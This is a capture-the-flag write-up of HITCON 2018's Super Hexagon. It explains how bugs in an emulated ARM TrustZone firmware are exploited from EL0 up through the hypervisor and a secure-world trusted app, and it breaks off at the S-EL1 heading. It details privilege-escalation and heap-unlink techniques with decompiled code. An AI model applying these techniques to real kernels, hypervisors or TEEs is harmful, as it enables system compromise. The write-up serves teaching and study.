There and Back Again: HITCON 2018’s Super Hexagon

One of the most interesting and unique CTF challenges I’ve seen over the past year was the “Super Hexagon” challenge from HITCON 2018. The challenge is unlike any other in several ways. A single bios.bin is distributed to the player that contains six (!) different levels to pwn, spread across all current exception levels, and involving both armv7 and aarch64 execution.

Each level requires the full gamut of exploitation skills; reversing, attack surface analysis, bug hunting, exploitation, and stable execution. Furthermore, challenges involving ARM Secure World attacks have been scarce in CTF, despite the prevalence of TrustZone in devices all around us. During the CTF itself, only one team (Dragon Sector) solved all 6 levels, and only 2 teams reached level 4. Since I missed working on the challenge during the CTF, I decided to revisit it here ahead of the upcoming HITCON 2019 CTF to solve and discuss all 6 levels of the challenge. Let’s begin!

A Brief Overview

challenge layout

Super Hexagon
Escape each level for your six flags.

EL0 - Hard
EL1 - Harder
EL2 - Hardest
S-EL0 - Hardester
S-EL1 - Hardestest
S-EL3 - Hardestestest

The challenge authors distributed a single targz consisting of a docker setup, with a qemu-system-aarch64 binary and a bios.blob. We also receive two qemu patches. One of them adds support for a new ARM machine “hitcon”, and the other patches QEMU to allow debugging ARM and thumb modes inside qemu-system-aarch64 - more on that later. The first qemu.patch also contains some useful physical memory layout information, which will inform our efforts later.

static const MemMapEntry memmap[] = {
    /* Space up to 0x8000000 is reserved for a boot ROM */
    [VIRT_FLASH] =              {          0, 0x08000000 },
    [VIRT_CPUPERIPHS] =         { 0x08000000, 0x00020000 },
    [VIRT_UART] =               { 0x09000000, 0x00001000 },
    [VIRT_SECURE_MEM] =         { 0x0e000000, 0x01000000 },
    [VIRT_MEM] =                { 0x40000000, RAMLIMIT_BYTES },
};

The challenge is distributed with a dockerfile, but to avoid dealing with docker we can create the required path on our own system (/home/super_hexagon/) and copy the binaies and flag folders there. When we run it, we’re presented with the following boot log:

NOTICE:  UART console initialized
INFO:    MMU: Mapping 0 - 0x2844 (783)
INFO:    MMU: Mapping 0xe000000 - 0xe204000 (40000000000703)
INFO:    MMU: Mapping 0x9000000 - 0x9001000 (40000000000703)
NOTICE:  MMU enabled
NOTICE:  BL1: HIT-BOOT v1.0
INFO:    BL1: RAM 0xe000000 - 0xe204000
INFO:      SCTLR_EL3: 30c5083b
INFO:      SCR_EL3:   00000738
INFO:    Entry point address = 0x40100000
INFO:    SPSR = 0x3c9
VERBOSE: Argument #0 = 0x0
VERBOSE: Argument #1 = 0x0
VERBOSE: Argument #2 = 0x0
VERBOSE: Argument #3 = 0x0
NOTICE:  UART console initialized
[VMM] RO_IPA: 00000000-0000c000
[VMM] RW_IPA: 0000c000-0003c000
[KERNEL] mmu enabled
INFO:      TEE PC: e400000
INFO:      TEE SPSR: 1d3
NOTICE:  TEE OS initialized
[KERNEL] Starting user program ...

=== Trusted Keystore ===

Command:
    0 - Load key
    1 - Save key

cmd>

From the log alone we can already derive some useful information, including virtual address ranges and translation table entries. A “TEE OS” is mentioned, which is likely resident in S-EL1. We also see the entrypoint for our input, which is a menu containing some key operations. Playing with these doesn’t yield much interesting yet, however.

=== Trusted Keystore ===

Command:
    0 - Load key
    1 - Save key

cmd> 1
index: 0
key: hello      
[0] <= hello
cmd> 0
index: 0
[0] => 0e00
cmd> 
index: 
[0] => 0e00
cmd> 

Initial Reversing

Opening the binary in IDA and disassembling the entrypoint yields instructions that look sufficiently like the start of EL3.

0x0004   MOVK  X0, #0x30C5,LSL#16 ; Set bits M, C, I
0x0008   MSR   6, c1, c0, #0, X0 ; [>] SCTLR_EL3 (System Control Register (EL3))
0x000C   ISB
0x0010   ADR   X0, el3_interrupt_table
0x0014   MSR   #6, c12, c0, #0, X0 ; [>] VBAR_EL3 (Vector Base Address Register (EL3))
0x0018   ISB
0x001C   MOV   X1, #0b1000000001010
0x0020   MRS   X0, #6, c1, c0, #0 ; [<] SCTLR_EL3 (System Control Register (EL3))
0x0024   ORR   X0, X0, X1
0x0028   MSR   #6, c1, c0, #0, X0 ; [>] SCTLR_EL3 (System Control Register (EL3))
0x002C   ISB
0x0030   MOV   X0, #0x238 ; Set bits EA, SIF
0x0034   MSR   #6, c1, c1, #0, X0 ; [>] SCR_EL3 (Secure Configuration Register)
0x0038   MOV   X0, #0x8000
0x003C   MOVK  X0, #1,LSL#16
0x0040   MSR   #6, c1, c3, #1, X0 ; [>] MDCR_EL3 (Monitor Debug Configuration Register (EL3))
0x0044   MSR   #7, #4  ; Clr PSTATE.DAIF [-A--]
0x0048   MOV   X0, #0
0x004C   MSR   #6, c1, c1, #2, X0 ; [>] CPTR_EL3 (Architectural Feature Trap Register (EL3))
0x0050   LDR   X0, =0xE002000
0x0054   LDR   X1, =0x202000

The binary begins by setting up several MSRs and copying code from the ROM into specific physical addresses. These will be a useful jumping off point for identifying the start of other code blobs, since the EL2/EL1/S-EL1 code is all mapped here by EL3. Tracing down further we find MMU initialization, and then a drop to a lower EL for further setup.

But where is EL1? searching for some of the menu strings (“0 - Load key”) and scrolling around yields something interesting - bios.bin contains an ELF header at offset 0xbc010.

000bbfe0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000bbff0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000bc000: 3200 0000 0000 0000 0000 0000 0000 0000  2...............
000bc010: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............ <--
000bc020: 0200 b700 0100 0000 e800 4000 0000 0000  ..........@.....
000bc030: 4000 0000 0000 0000 c8a7 0000 0000 0000  @...............

EL0: Getting started

Extracting the header yields a valid, statically linked ELF file with debug symbols. checksec tells us there is no ASLR, but NX is enabled (we can confirm this is enforced in our debugger). The ELF looks very similar to a standard Linux userland binary, and comes baked with simple libc functions (printf/puts/read/scanf). Based on the strings and functionality, this is definitely our EL0 code. The first task the binary does is to load an opaque trustlet blob via syscall, followed by mapping some “world shared memory” buffers.

void load_trustlet(unsigned __int8 *base, int size)
{
  size_t v4;
  void *v5;
  unsigned int v6;
  TCI *v7;
  unsigned int v8;

  v4 = (size + 4095) & 0xFFFFF000;
  v5 = mmap(0LL, v4, 3, 0, 0, -1LL);
  v6 = tc_register_wsm(v5, (void *)v4);
  if ( v6 == -1 )
  {
    printf("tc_register_wsm: failed to register world shared memory\n");
    exit(0xFFFFFFFFLL);
  }
  memcpy(v5, base, size);
  if ( (unsigned int)tc_init_trustlet(v6, size) )
  {
    printf("tc_init_trustlet: failed to load trustlet\n");
    exit(0xFFFFFFFFLL);
  }
  v7 = (TCI *)mmap(0LL, 0x1000uLL, 3, 0, 0, -1LL);
  v8 = tc_register_wsm(v7, (void *)0x1000);
  if ( v8 == -1 )
  {
    printf("tc_register_wsm: failed to register world shared memory\n");
    exit(0xFFFFFFFFLL);
  }
  tci_buf = v7;
  tci_handle = v8;
}

We can surmise that the WSM buffers are likely shared mappings between normal and secure world. After setting up the trustlet code, the binary inializes a function pointer table with 2 functions, then goes into a loop calling the run() function for 10 iterations.

void run()
{
  int64_t buf_len;
  int idx;
  int cmd;

  printf("cmd> ");
  scanf("%d", &cmd);
  printf("index: ");
  scanf("%d", &idx);
  if ( cmd == 1 )
  {
    printf("key: ");
    scanf("%s", buf); // <---- [A]
    buf_len = (unsigned int)strlen(buf);
  }
  else
  {
    buf_len = 0LL;
  }
  cmdtb[cmd])(buf, (unsigned int)idx, buf_len); // <---- [B]
}

This function is trivially vulnerable. At [A], we use the uncontrolled %s format specifier with scanf() to read into a buf created with mmap earlier. At [B], we invoke a function pointer in the cmdtb, but the (signed) index is not bounded. For that function call we control the data pointed to by the first argument, buf, and the lower 32 bits of the second argument, idx. Since cmdtb is also in the BSS let’s further examine the surrounding memory layout there.

0x0412650: input           ; unsigned __int8 input[256]
0x0412750: cmdtb           ; cmd_func cmdtb[2]
0x0412760: tci_handle      ; unsigned int tci_handle
0x0412768: buf             ; unsigned __int8 *buf
0x0412770: tci_buf         ; TCI *tci_buf

The static buffer input is used directly inside the scanf() function, which invokes our good old friend gets().

int scanf(const unsigned __int8 *fmt, ...)
{
  __va_list_tag va[1];
  __va_list_tag ap[1];

  va_start(va, fmt);
  va_start(ap, fmt);
  gets(input); // <---- full control of input
  return vsscanf(input, fmt, (__va_list *)va);
}

We can write function pointers directly to the input buffer and then invoke them with a negative cmdtb offset, for control of PC. But where to go? Scanning the binary reveals an mprotect syscall, which is perfect. We can populate our shellcode into the buf pointer with scanf in an initial pass, then invoke the function again to set buf_len to 7. Since it’s being read in with scanf, we’ll write a simple alphanumeric stager to read in our real unrestricted payload.

ERROR:   [VMM] RWX pages are not allowed

Oops! Seems like the EL2 hypervisor prevents us from mapping RWX. Luckily, we can read in the shellcode first and then just mprotect it R-X, no problem.

EL1: Escalating Privileges

Now that we can execute arbitrary code in EL0 context, we can begin auditing EL1. For this we return back to bios.bin. We’ll again examine the memcpy functions invoked by EL3 to find something that looks like EL1. The blob at 0xb0000, aarch64 code, contains strings prefixed with [KERNEL], so it’s a safe bet. Our primary concern is the syscall interface, since it’s the only interface we know of exposed to EL0. We find the syscall function handler at 0xB8BA8.

4 main syscalls are exposed to us: write, read (only 1 char at a time), mmap, and mprotect. We also have a series of secure call passthrough syscalls, which we’ll revisit later. mmap and mprotect both perform extensive checking on their arguments.

if ( syscall_nr == 0xDE ) // mmap, for example
{
  if ( addr ) // addr must be NULL (no MAP_FIXED)
  {
    prot = -1i64;
  }
  else if ( size & 0xFFF ) // size must be page aligned
  {
    prot = -1i64;
  }
  else
  {
    v12 = el1_find_contiguous_pages(size);
    if ( v12 == -1 )
    {
      prot = -1i64;
    }
    else
    {
      v21 = el1_allocate_el0_page(size);
      for ( j = v12; arg1 + v12 > j; j += 4096i64 )
        el1_change_el0_page_permissions(j, j + v21 - v12, prot);
      prot = v12;
    }
  }
}

write also looks relatively straightforward

else if ( syscall_nr == 0x40 )
{
for ( i = 0i64; i < len; ++i )
  el1_output_char(buffer[i]);
}

That leaves us with only read, which helps us out with a very useful bug.

if ( syscall_nr == 0x3F ) // read
{
    if ( arg2 )
    {
      ch = el1_read_char();
      if ( ch & 0x80000000 )
      {
        arg2 = -1i64;
      }
      else
      {
        *(_BYTE *)outp = ch; // <---- [A]
        arg2 = 1i64;
      }
    }
}

After reading in the character via el1_read_char(), it will write it back to the specified memory address. The kernel is not enforcing PAN hardware protections, so it can write directly to the specified userspace address. Astute readers will notice there’s no null check, or check to see if the address is mapped in userspace, meaning we can pass in any kernel address and write directly to it. This used to be a pretty common bug class but still pops up ever now and then, most recently seen in FreeBSD for example.

The kernel has no ASLR to speak of, but the hypervisor is still enforcing NX. Writing to the stack could be a possibility; smashing our saved frame pointer could allow us to pivot a higher level call and achieve PC control, at which point we can ret2usr and run shellcode off an existing mapping.

I took a different approach however, since I didn’t think of that at the time. Instead, I decided to directly target EL1 translation table entries (TTEs) to replace a kernel page physaddr with that of my shellcode.

tte diagram

Tracing through EL1 boot code, we find el1_setup_user_mappings(), which invokes el1_change_el0_page_permissions() to update TTE values whenever any page will be mapped. This occurs both when EL1 maps itself, as well as when EL1 loads the userspace ELF.

void el1_change_page_permissions(uint64_t virtaddr, uint64_t physaddr, char prot)
{
  uint64_t vaddr; // x22
  int64_t v4; // x19
  int64_t v5; // x20
  int64_t v6; // x21
  int64_t v7; // x0

  vaddr = virtaddr;
  if ( 0x400DC000 > physaddr || (v4 = physaddr, 0x400EB000 <= physaddr) )
  {
    el1_kprintf_0((__int64)"[KERNEL] Try to map illegal PA (user)\n");
    el1_wfi_spinloop();
  }
  if ( prot & 2 )
  {
    v5 = 0x4C3i64;
    v6 = 0x20000000000443i64;
  }
  else
  {
    v5 = 0x443i64;
    v6 = 0x200000000004C3i64;
  }
  if ( !(prot & 4) )
  {
    v6 |= 0x40000000000000ui64;
    v5 |= 0x40000000000000ui64;
  }
  v7 = el1_virt_to_phys(*(_QWORD *)((char *)&unk_C8BD7 + 0x15B9));
  el1_update_page_table(0i64, v7, vaddr, v6 | v4);
  el1_hypervisor_call(1i64, v4, v5, 0i64); // invoke vmm_mmap
  __asm { SYS   #0, c8, c7, #0 }
}

Notice that each translation table operation made also invokes a call to vmm_mmap in EL2 to validate the operation; this is the point at which our earlier attempt to map RWX triggered an abort(). The actual operation itself happens just before that hypercall, in el1_update_page_table.

// translationtable is a qword array
translationtable[((virtaddr >> 12) & 0x1FF))] = physaddr_with_flags;

We can examine these TTEs in a debugger to get an idea of their values, but the above function also maps prot values cleanly to expected flags

gef>  x/i $pc
=> 0xffffffffc000875c:  str     x3, [x1, x2, lsl #3]

// the base of our translation table
gef>  x/4xg $x1
0xffffffffc0023000:     0x002000000002c4c3      0x002000000002d4c3
0xffffffffc0023010:     0x002000000002e4c3      0x0000000000000000

// the virtaddr to be updated
gef>  p $x19
$15 = 0x412000

// the entry for this address, mapped RW
gef>  stepi
gef>  x/xg $x1 + ($x2 << 3)
0xffffffffc0023090:     0x006000000002f443

Abusing the read bug, we can read updated values directly into the PTE entry. But writing still faults! As it turns out, without the el1_hypervisor_call at the end of el1_change_page_permissions, the MMU in EL2 won’t be updated to reflect the changes, and will fault on our write attempt. These memory flags in EL2 seem to be associated with the physical page address, so our writable mappings won’t work directly.

To avoid this, we can twiddle the bits on the TTE to point the existing page to our own, after we’ve already mapped it executable. Then, smashing a single byte in the stored return value on the stack should allow our syscall handler to return to our now-kernel-mapped shellcode page. The final flow of the exploit works as follows.

Copy shellcode from the exploit script onto a RW mapping made with mmap
Update the mapping to be RX
Get its physical page number (deterministic across runs)
Write to EL1’s TTE for the virtal address associated with the base of the kernel. Make it point to our physical page
Smash a byte in the return address on the syscall handler stack. Again, this address will be deterministic. Execution returns to an offset in the first page of EL1, which now points to controlled data :)

EL2: (Almost) bare (emulated) metal

Wow, kernel execution! Normally this would be great, but we’re only 2/6 of the way through. We’re now faced with targeting EL2, also known as the vmm or hypervisor. EL3 init tells us that EL2 starts at offset 0x10000, with a very small amount of code, mostly enabling MSR’s and setting up UART for terminal r/w. The vmm itself is mapped beginning at physical address 0x40100000. Of note as always is the EL2 MMU setup, which gives us another clue to the boot log puzzle.

void __cdecl el2_setup_mappings()
{
  unsigned __int64 i;
  __int64 v1;
  __int64 v2;
  unsigned __int64 j;
  unsigned __int64 k;
  __int64 v5;
  __int64 v6;

  el2_memset(el2_pte, 0, 0x1000i64);
  el2_memset(vmm_translationtables, 0, 0x8000i64);
  for ( i = 0i64; i <= 0x1FFFFF; i += 0x200000i64 )
    el2_pte[(i >> 21) & 0x1FF] = (uint64_t)&vmm_translationtables[512 * ((i >> 21) & 0x1FF)] | 3;
  el2_printf("[VMM] RO_IPA: %08x-%08x\n", v5, v6);
  el2_printf("[VMM] RW_IPA: %08x-%08x\n", v1, v2);
  for ( j = 0i64; j <= 0xBFFF; j += 0x1000i64 )
    el2_mmap(j, 0x443i64);
  for ( k = 0xC000i64; k <= 0x3BFFF; k += 0x1000i64 )
    el2_mmap(k, 0x400000000004C3i64);
  _WriteStatusReg(ARM64_SYSREG(3, 4, 2, 1, 0), (unsigned __int64)el2_pte); // VTTBR_EL2
  _WriteStatusReg(ARM64_SYSREG(3, 4, 2, 1, 2), 0x80000027ui64); // VTCR_EL2
}

At boot, the printfs emitted were as follows

[VMM] RO_IPA: 00000000-0000c000
[VMM] RW_IPA: 0000c000-0003c000

Beginning at 0x40100000, it seems that EL2 reserves 0xC000 bytes for itself and then maps 0x30000 for EL1 and EL0. Those latter entries have the PXNbits set, so the vmm won’t execute off them directly.

The only exposed interface we’ve seen is the hypercall after the TTE update, so let’s take a look at the El2 hypercall interface

_QWORD * el2_handle_hypercall(__int64 *args)
{
  unsigned int v2;
  signed __int64 arg0;
  _QWORD *arg1;
  __int64 arg3;

  v2 = (unsigned int)_ReadStatusReg(ARM64_SYSREG(3, 4, 5, 2, 0)) >> 26;
  arg0 = *args;
  arg1 = (_QWORD *)args[1];
  arg3 = args[3];
  if ( v2 == 0x16 )
  {
    if ( arg0 == 1 )
      arg1 = el2_mmap(arg1, args[2]);
    else
      arg0 = -1i64;
  }
  else
  {
    // ... ignore securecall passthrough for now ...
  }
  *args = arg0;
  return arg1;
}

There’s only one hypercall, which is el2_mmap. Before even opening the function, we envision that any bug must somehow allow us the ability to map an EL2 physical address to a writable mapping in EL1. We’re aware that the two arguments passed, as seen in the EL1 call, are physical address and TTE bits.

IDA has trouble with some of the spinloop functions that don’t return, so we’ll directly examine the assembly. In the interest of space I’ve trimmed it to the relevant sections and annotated it.

0x101E0 el2_mmap              ; CODE XREF: el2_setup_mappings+A4↓p
0x101E0
0x101E0 LSR X2, X0, #0x15
0x101E4 UBFX X4, X0, #0xC, #9
0x101E8 CMP X0, #0x3B,LSL#12  ; Compare the first arg to 0x3b0000
0x101EC B.EQ loc_1024C

0x101F0 STP X29, X30, [SP,#var_10]!
0x101F4 MOV X29, SP
0x101F8 MOV X3, #0xBFFF
0x101FC MOVK X3, #3,LSL#16
0x10200 CMP X0, X3            ; Make sure the first argument is <= 0x3bffff
                              ; otherwise, print "[VMM] Invalid IPA"
0x10204 B.HI loc_10294
0x10208 MOV X3, #0xBFFF
0x1020C CMP X0, X3
0x10210 B.HI loc_10218         ; Check if the argument is > 0xBFFF
                               ; If so, skip this next instruction
0x10214 TBNZ W1, #7, loc_1026C ; Check the TTE flags for bit 7, indicating writable memory
                               ; If so, reject with error:
                               ; "[VMM] try to map writable pages in RO protected area"
                               
0x10218 loc_10218              ; CODE XREF: el2_mmap+30↑j
0x10218 AND X3, X1, #0x7FFFFFFFFFFF80
0x1021C AND X3, X3, #0xFFC00000000000FF
0x10220 CMP X3, #0x80         
0x10224 B.EQ loc_10280         ; 0x80 in the bitflags indicates RWX pages
                               ; [VMM] RWX pages are not allowed
0x10228 MOV X3, #0x40000000   
0x1022C ADD X0, X0, X3
0x10230 ORR X0, X0, X1
0x10234 ADD X2, X4, X2,LSL#9
0x10238 ADRP X1, #vmm_translationtable@PAGE
0x1023C ADD X1, X1, #vmm_translationtable@PAGEOFF
0x10240 STR X0, [X1,X2,LSL#3]  ; All is well; insert the TTE
0x10244 LDP X29, X30, [SP+0x10+var_10],#0x10
0x10248 RET

The checks here are pretty robust. We can’t request writable memory in the EL2 code pages, nor can we pass in a too-large physical address. But there’s one oversight - physical addresses are not required by el2_mmap() to be aligned to 0x1000, and in fact they are never masked off before being written to the table.

The final value inserted into the translation table is (0x40000000 + arg1) | arg2, so the unmodified bottom bits of arg will influence the flags of the entry. Therefore, a call like hypercall(VMM_mmap, 0x14c3, 0x100000) yields the final TTE 0x400114C3, a RW mapping of the EL2 code page0x40101000, which is inside the RO region! Exploitation is short and sweet, requiring only a single buggy hypercall. With some quick scripting, we can copy our shellcode onto our EL1 virtual address and find it dual-mapped as an EL2 page, yielding execution in hypervisor context.

Securecalls, and playing Telephone

With the completion of EL2 we’ve conquered the entirety of normal world! But til this point we’ve ignored all calls to the secure world, which is where we’re find the other 3 flags we’re still missing. As a brief description, ARM segregates execution space into normal and secure worlds, where the only communication between the two is brokered by the Secure Monitor (EL3). secure world is intended for safeguarding personal data, like fingerprints, payment information, or passwords, and it presents an API accessible over “secure calls” made with the smc instruction. Secure world has similar exception levels to normal world, with an S-EL1 (“Trusted OS” or “TEE”) running “Trusted Apps” in the S-EL0 userspace. There’s currently no S-EL2 hypervisor equivalent, but it is coming in ARMv8.4.

smc is privileged and cannot be made directly by EL0, so in our case the EL0 makes a special syscall to flag its intention to EL1.

0x0401B84 ; signed __int64 tc_register_wsm(void *a1, void *a2)
0x0401B84 EXPORT tc_register_wsm
0x0401B84 tc_register_wsm
0x0401B84 MOV             X8, #3
0x0401B88 MOVK            X8, #0xFF00,LSL#16 ; x8 becomes 0xFF000003LL
0x0401B8C SVC             0
0x0401B90 RET
0x0401B90 ; End of function tc_register_wsm
0x0401B90

EL1 contains some basic validation on the securecall arguments in our case, then invokes the smc instruction to generate a trap.

void el1_securecall_passthrough(__int64 a1, __int64 arg1, unsigned __int64 arg2)
{
  unsigned __int64 v4;
  __int64 v5;
  unsigned __int64 i;
  signed __int64 v7;

  v4 = arg2;
  if ( a1 == 0xFF000005i64 )
  {
    if ( !(arg1 & 0xFFF) )
      el1_make_smc(0x83000005i64, (unsigned int)arg1, (unsigned int)arg2, 0i64);
  }
  else if ( a1 == 0xFF000003i64 )
  {
    if ( !(arg2 & 0xFFF) && arg2 <= 0x4000 && !(arg1 & 0xFFF) ) // validate physical page
    {
      v5 = el1_get_page_physaddr(arg1); // make sure the first page is mapped
      if ( (_DWORD)v5 != -1 )
      {
        for ( i = arg1 + 4096; arg1 + v4 > i; i += 4096i64 )
        {
          v7 = el1_get_page_physaddr(i);
          if ( (_DWORD)v7 == -1 || i + v5 - arg1 != v7 ) // make sure subsequent pages are mapped
            return;
        }
        el1_make_smc(0x83000003i64, v5, v4, 0i64); // invoke smc
      }
    }
  }
  else if ( a1 == 0xFF000006i64 && !(arg1 & 0xFFF) )
  {
    el1_make_smc(0x83000006i64, arg1, 0i64, 0i64);
  }
}

EL2 receives the trap inside its handler, since we’re technically under virtualization, and again executes an smc after some validation.

    if ( arg0 == 0x83000003i64 )
    {
      if ( arg1 <= 0x3C000 )
        arg0 = el2_make_smcall(0x83000003i64, arg1 + 0x8000000);
      else
        arg0 = -1i64;
    }
    else
    {
      arg0 = el2_make_smcall(arg0, arg1);
    }

Finally, we reach our secure monitor code in EL3, which does the actual passover into secure world and sets up the arguments. But who finally receives the call?

S-EL0: A whole new (secure) world

Stepping through EL3’s call to S-EL1/S-EL0 in a debugger quickly yields GDB errors. Luckily, with some quick consulting of the README and included patch files, we notice that the organizers included one that changes QEMU’s debug server to return 32bit ARM registers.

-    cc->set_pc = aarch64_cpu_set_pc;
-    cc->gdb_read_register = aarch64_cpu_gdb_read_register;
-    cc->gdb_write_register = aarch64_cpu_gdb_write_register;
-    cc->gdb_num_core_regs = 34;
-    cc->gdb_core_xml_file = "aarch64-core.xml";
-    cc->gdb_arch_name = aarch64_gdb_arch_name;
+    cc->set_pc = arm_cpu_set_pc;
+    cc->gdb_read_register = arm_cpu_gdb_read_register;
+    cc->gdb_write_register = arm_cpu_gdb_write_register;
+    cc->gdb_num_core_regs = 26;
+    cc->gdb_core_xml_file = "arm-core.xml";
+    cc->gdb_arch_name = arm_gdb_arch_name;

It seems like the S-EL0 and S-EL1 implementations actually run 32-bit ARM, not aarch64! We can quickly verify this by pulling the qemu-3.0.0 source and building it with the provided patch. We now lose the ability to debug aarch64, but we can break and see ARM instructions in our secure world. To be precise, it is big-endian ARM, but executing mostly in thumb mode. At this point I chose to create a second idb for bios.bin to help with reversing, and rebased it to be appropriate for S-EL1.

Let’s begin by examining the trustlet blob passed to tc_init_trustlet() back in EL0. The code registered a blob of length 0x750, beginning with the string literal “HITCON\x00\x00”.

00000000: 4849 5443 4f4e 0000 6b12 0000 0010 0000  HITCON..k.......
00000010: 8406 0000 0020 0000 a800 0000 0000 1000  ..... ..........
00000020: 7010 0800 b0b5 8eb0 00af 7860 41f2 6c03  p.........x`A.l.
00000030: c0f2 1803 1b68 7b63 42f2 0003 c0f2 0003  .....h{cB.......
00000040: 07f1 0c04 1d46 0fcd 0fc4 0fcd 0fc4 2b68  .....F........+h
00000050: 2380 7b6b 3b63 3b6b 0122 1a60 3b6b 0c33  #.{k;c;k.".`;k.3
00000060: 07f1 0c02 1146 1846 00f0 f8fa 0020 00f0  .....F.F..... ..
00000070: 0ffb b0b5 90b0 00af 7860 7b68 5b68 fb63  ........x`{h[h.c
00000080: fb6b 092b 09d8 40f2 0002 c0f2 1002 fb6b  .k.+..@........k
00000090: db00 1344 5b68 002b 1ad1 42f2 2403 c0f2  ...D[h.+..B.$...

The consistency of the first 0x20 bytes makes them look like a blob header, meaning this is probably a custom executable format. To understand it better, we’ll have to do some basic reversing of S-EL1.

According to EL3, S-EL1 is loaded at physical address 0xE400000 and from offset 0x20000 in bios.bin. It’s nonsensical in our aarch64 idb, but in our 32bit one we find a distinct interrupt table at that offset. Inside the reset handler we find the usual MSR twiddling and MMU setup. However, we’re instead interested in the function that handles secure calls, since that is the code responsible for tci_init_trustlet(). That handler occurs at 0x2087C, where we find 4 possible secure calls.

void sel1_handle_securecall(int cmd, int arg0, int arg1)
{
  int v0;

  switch ( cmd )
  {
    case 0:
      v0 = sel1_mmap_world_shared_memory(arg0, arg1);
      sel1_return_val_to_normal_world(0x83000007, v0);
      return;
    case 1:
      v0 = sel1_unmap_from_sel0(arg0, arg1);
      sel1_return_val_to_normal_world(0x83000007, v0);
      return;
    case 2:
      v0 = sel1_load_trusted_app(arg0, arg1);
      sel1_return_val_to_normal_world(0x83000007, v0);
      return;
    case 3:
      v0 = sel1_call_trusted_app(arg0);
      sel1_return_val_to_normal_world(0x83000007, v0);
      return;
    default:
      sel1_return_val_to_normal_world(0x83000007, -1);
      return;
  }
}

With the exception of sel1_unmap_from_sel0, we’ve seen these securecalls invoked from EL0. We can peek intosel1_load_trusted_app to better understand the binary format

signed int sel1_load_trusted_inner(_DWORD *trustlet, unsigned int length)
{
  unsigned int v5;
  unsigned int v6;
  unsigned int len;
  _BYTE *v8;

  if ( !sel1_check_sha256(trustlet, length) )   // verify trustlet hash
    return -1;
  v8 = trustlet + trustlet[4] + 0x24;           // get the data section
  len = (((trustlet[4] - 1) >> 12) + 1) << 12;
  if ( sel1_map_page_into_sel0(trustlet[3], len, 10) == -1 )
    return -1;
  v6 = (((trustlet[6] - 1) >> 12) + 1) << 12;   // grab the bss length
  if ( trustlet[6] )
  {
    if ( sel1_map_page_into_sel0(trustlet[5], v6, 14) == -1 )
      return -1;
  }
  v5 = (((trustlet[8] - 1) >> 12) + 1) << 12;
  if ( trustlet[8] )
  {
    if ( sel1_map_page_into_sel0(trustlet[7], v5, 14) == -1 )
      return -1;
  }
  if ( sel1_map_page_into_sel0(0xFF8000u, 0x8000, 14) == -1 ) // map stack
    return -1;
  sel1_memset(trustlet[3], 0, len);
  sel1_memcpy(trustlet[3], trustlet + 0x24, trustlet[4]);// copy in text section
  if ( trustlet[6] )
  {
    sel1_memset(trustlet[5], 0, v6);
    sel1_memcpy(trustlet[5], v8, trustlet[6]);
  }
  if ( trustlet[8] )
    sel1_memset(trustlet[7], 0, v5);
  sel1_memset(0xFF8000, 0, 0x8000);             // set up stack
  sel0_stored_retaddr = trustlet[2];
  sel0_cmdbuf_addr = trustlet[8] + trustlet[7] - 4;
  return 0;
}

After verifying the sha256 of the image against a hardcoded hash, it loads a text, data, and bss section from the buffer. No relocations, so ASLR is off. Armed with this information, we can load the file into IDA and lay out segments at fixed addresses to get an understand of S-EL0.

S-EL0 is a small binary composed of big-endian thumb code. In its command handler, it receives a pointer to a “tci” buffer, where the first dword is a command type. Only load_key and save_key are defined, but of interest is that save_key allocates buffers for the keys via a simple dlmalloc implementation. It invokes malloc() for a new key index, and if an existing key index is given to overwrite, it will first free() the value at that position.

The save_key and load_key functions operate on the handle passed by userspace, where that handle is actually the buffer’s S-EL0 virtual address. This means we can operate on any “buffer” by passing in a arbitrary “handle”.

This heap allocator uses the same chunk header as glibc malloc would use for a smallbin. Rather than multiple freelists based on chunk size, it puts all chunks into a single one comparable to glibc’s unsortedbin list. It does support mmap’d chunks when the size requested is >0x40000. When freeing a non-mmap’d chunk, it will attempt consolidation with the previous next chunks.

After spending some time auditing the heap implementation, I became interested in the mmap chunk code, since if we could get a writable mapping to the page the chunk was in, we’d be able to directly write to the chunk header. Here’s the relevant mmap syscall handler in S-EL1

_BYTE * sel1_mmap_syscall(__int16 req_virtaddr, int size)
{
  int v4;
  _BYTE *v5;

  v4 = size;
  if ( req_virtaddr & 0xFFF )
    return -1;
  if ( size & 0xFFF )
    return -1;
  if ( !size )
    return -1;
  v5 = sel1_find_contig_virtpage(size);
  if ( v5 == -1 || sel1_map_page_into_sel0(v5, v4, 10) == -1 )
    return -1;
  sel1_memset(v5, 0, v4);
  return v5;
}

The code attempts to find a contigous set of virtual addresses to suit the mapping, then sel1_map_page_into_sel0 will choose physical addresses and update the translation tables. Now, take a look at the sel1_map_world_shared_memory securecall handler we had access to via EL0.

signed int sel1_mmap_world_shared_memory(unsigned int physaddr, int size)
{
  signed int v2;
  int v6;

  if ( !size
    || size & 0xFFF
    || physaddr & 0xFFF
    || physaddr < 0x40000000
    || (v6 = sel1_find_contig_virtpage(size), v6 == -1)
    || sel1_map_page_tables(v6, physaddr, size, 2) == -1 )
  {
    v2 = -1;
  }
  else
  {
    v2 = v6;
  }
  return v2;
}

This code uses the same virtual address range! Finally, note the unused munmap syscall and securecall. With these primitives, we’ll actually use the interaction of S-EL1 to pwn S-EL0 in the following way.

Make a mapping in S-EL0 of size 0x40000. We need a buffer this big in S-EL0 as a source for the memcpy() initializing our chunk.
Use the unmap securecall to unmap the first page of the mapping
Map in a single normal world physical page as world shared memory. This will land on our just-freed virtual address
Fill up the trusted app request to cause an mmap’d chunk of size 0x40000 to be created
Free the first page of that chunk with the unmap securecall
Map over it to fully control the chunk header

Once we have control of the chunk header, we’ll twiddle the bits to convert it to a normal chunk, and then abuse heap consolidation’s unsafe-unlink to trigger a write to the saved return address in sel0_free. Everything in S-EL0 is mapped RWX, so we can just return directly to our shellcode buffer and gain S-EL0 execution.

As a final note, ARM doesn’t have msr in the same way aarch64 does, so we read the flag via the mrc instruction

mrc p15,3,r1,c15,c12,0
str r1, [r0]
mrc p15,3,r1,c15,c12,1
str r1, [r0,#4]
mrc p15,3,r1,c15,c12,2
str r1, [r0,#8]
mrc p15,3,r1,c15,c12,3
str r1, [r0,#0xC]
mrc p15,3,r1,c15,c12,4
str r1, [r0,#0x10]
mrc p15,3,r1,c15,c12,5
str r1, [r0,#0x14]
mrc p15,3,r1,c15,c12,6
str r1, [r0,#0x18]
mrc p15,3,r1,c15,c12,7
str r1, [r0,#0x1c]

S-EL1: Failing upwards

